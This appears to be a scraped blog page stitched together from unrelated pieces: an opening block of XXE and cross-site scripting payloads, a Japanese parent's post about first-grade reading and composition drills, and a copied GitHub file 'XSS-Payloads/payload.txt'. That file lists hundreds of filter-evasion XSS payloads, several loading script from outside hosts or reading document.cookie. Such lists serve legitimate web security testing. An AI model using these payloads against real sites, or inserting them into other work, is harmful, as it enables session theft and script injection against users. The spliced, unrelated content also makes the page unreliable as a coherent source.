<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> <script>alert('XSS')</script> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert('XSS')> <img src=xss onerror=alert(1)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <marquee onstart='javascript:alert('1');'>=(?_?)=
1 note
·
View note
Text
小1の国語でやったこと。
国語の文章読解というものの意味がわからんとか言うのでコレを買った。

小学1年の文章読解 (毎日のドリル)
posted with amazlet at 19.04.17
学研プラス 売り上げランキング: 3,695
Amazon.co.jpで詳細を見る
買ってはみたものの面倒臭がって学年後半になるまでまったく手を付けなかったのだけど 進級する前にやっちゃえよ。って言ったら冬休みあたりから始めて全部終わらせた。 自分のことなのに「全然やってないじゃん……」って呆れて本気出していた。 両親ともにドリルなんて終わらせたことがないタイプなので、つぎつぎ終わらせていくお子さんを尊敬している。
コツとパターンで理解したいタイプなので繰り返しやってるうちに慣れたらしく 今のところはテストは難なくこなしてる。
あとは、作文を書かなきゃいけなくなると必ず泣くのでこれも買った。

小学1年のさく文 (毎日のドリル)
posted with amazlet at 19.04.17
学研プラス 売り上げランキング: 66,608
Amazon.co.jpで詳細を見る
『子どものための論理トレーニング』の簡単バージョンって感じ。 文章読解よりかは楽しんでやってた。書き写しが多くて読み解かなくていいので楽だからだとは思う。
これですぐに作文書けるか? って言ったら子ども自身がすぐに「なるほどね。いつ、どこで、なにをどうした。はじめに、つぎに、さいごに。を使えばいいんですね」とはならないと思うんだけど、いざ作文を書かなきゃいけないようなとき、あのときやったあれを使えばいいんじゃないの? って親が提案できるんじゃないかな、と思う。なので終わったプリントはしばらく捨てないほうがよさそう。
学校用の作文は書けるよう��なっても、それが面白いかどうかは別なのでそこらへんはお子さんと話し合っていかなきゃならないんだろうなって感じ。
どちらも個人的には「それを解答として書くの?」って国語っていうか文学が面白くなくなりそうな納得のいかない部分があったけど、 試験とか評価という点で求められているのってこういうことだからいいっちゃいいのかなあ? とも思ったけど、うーんって感じだった。
今後は必要そうならこれをやろうと思っている。

子どものための論理トレーニング・プリント
posted with amazlet at 19.04.17
三森ゆりか PHP研究所 売り上げランキング: 7,766
Amazon.co.jpで詳細を見る
わたしがやってみたくて買ったんだけど、 基本は小学生のとき散々やらされた「ぼくは○○をしました。どうしてかというと〜」ってやつで、大人としてこれをやったらことばのひねり出し方というか書くための対照物の見かたの角度を増やすのに役立った。何かを伝えるためのことばを書くのが全然思いつかなくて苦手なのだけど、ちょっと書くことがこわくなくなった。
いまはZ会のグレードアップ問題集の読解をやってるんだけど、 これはまたいずれ感想があったら書こうと思う。
あとはその時習っている漢字をノートに1文字ずつ渾身の1回きりで書くっていうのをひたすら半年近く続けている。1回しか書けないってことにして、書き順とハネトメをしっかり見て自分の納得いく字になるように丁寧にやるだけ。
毎週1回は漢字テストがあるし、冬休み明けに全問テストがあるという話だったのでそこら辺から本気を出して始めた。 面倒臭がってブーブー文句を言いながらやっていたんだけど、全問テストで満点を取ってきたら納得したらしく、さも当然とばかりにやっててお互いに良い成功体験になった。
2 notes
·
View notes
Text
rrr
Skip to content
Why GitHub?
Enterprise
Explore
Marketplace
Pricing
Sign in
Sign up
15
256
247
pgaijin66
/
XSS-Payloads
Code
�� Issues 0
Pull requests 0
Projects 0
Security
Insights
Join GitHub today
GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.
XSS-Payloads/payload.txt
pgaijin66
Add files via upload
af350ef
on Aug 23, 2016 525 lines (433 sloc) 27.3 KB <script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(“XSS”)</script> <script>alert(“XSS”);</script> <script>alert(‘XSS’)</script> “><script>alert(“XSS”)</script> <script>alert(/XSS”)</script> <script>alert(/XSS/)</script> </script><script>alert(1)</script> ‘; alert(1); ‘)alert(1);// <ScRiPt>alert(1)</sCriPt> <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(‘XSS’)> <img src=xss onerror=alert(1)> <iframe %00 src="	javascript:prompt(1)	"%00> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt %00>alert(1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ "><h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> <img/  src=`~` onerror=prompt(1)> <form><iframe  src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[�]"� onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( �</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert(1)> <///style///><span %2F onmousemove='alert(1)'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript:\u0061le%72t(1)"><button> <div onmouseover='alert(1)'>DIV</div> <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT:alert(1)">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript:alert(document.cookie)>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> <svg><script ?>alert(1) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript:\u0061le%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script> <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert("XSS")> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form><button formaction="javascript:alert(XSS)">lol <!--<img src="--><img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> <style><img src="</style><img src=x onerror=alert(XSS)//"> <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(123)</script>"> <div style="font-family:'foo;color:red;';">LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC=\"mocha:[code]\"> <IMG SRC=\"livescript:[code]\"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert('XSS')\"> <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"width: expression(alert('XSS'));\"> <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"> <XSS STYLE=\"xss:expression(alert('XSS'))\"> exp/*<A STYLE='no\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF=\"javascript:alert('XSS');//\"> <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED> <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED> a=\"get\"; b=\"URL(\\"\"; c=\"javascript:\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML> <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> <XML SRC=\"xsstest.xml\" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"> </BODY></HTML> <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT> <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"--> <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <A HREF=\"http://66.102.7.147/\">XSS</A> <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> <A HREF=\"http://1113982867/\">XSS</A> <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A> <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> <A HREF=\"//www.google.com/\">XSS</A> <A HREF=\"//google\">XSS</A> <A HREF=\"http://ha.ckers.org@google\">XSS</A> <A HREF=\"http://google:ha.ckers.org\">XSS</A> <A HREF=\"http://google.com/\">XSS</A> <A HREF=\"http://www.google.com./\">XSS</A> <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A> <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A> < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\"javascript:alert('XSS')\" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\"XSS\");//<</SCRIPT> <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")> <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <IMG SRC=\" javascript:alert('XSS');\"> perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=\"javascript:alert('XSS');\"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--\"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascrscriptipt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION <form><button formaction="javascript:alert(123)">crosssitespt <frameset onload=alert(123)> <!--<img src="--><img src=x onerror=alert(123)//"> <style><img src="</style><img src=x onerror=alert(123)//"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="javascript:alert(1)"> <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <script>({0:#0=alert/#0#/#0#(123)})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> <script src="#">{alert(1)}</script>;1 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> <svg xmlns="#"><script>alert(1)</script></svg> <svg onload="javascript:alert(123)" xmlns="#"></svg> <iframe xmlns="#" src="javascript:alert(1)"></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- 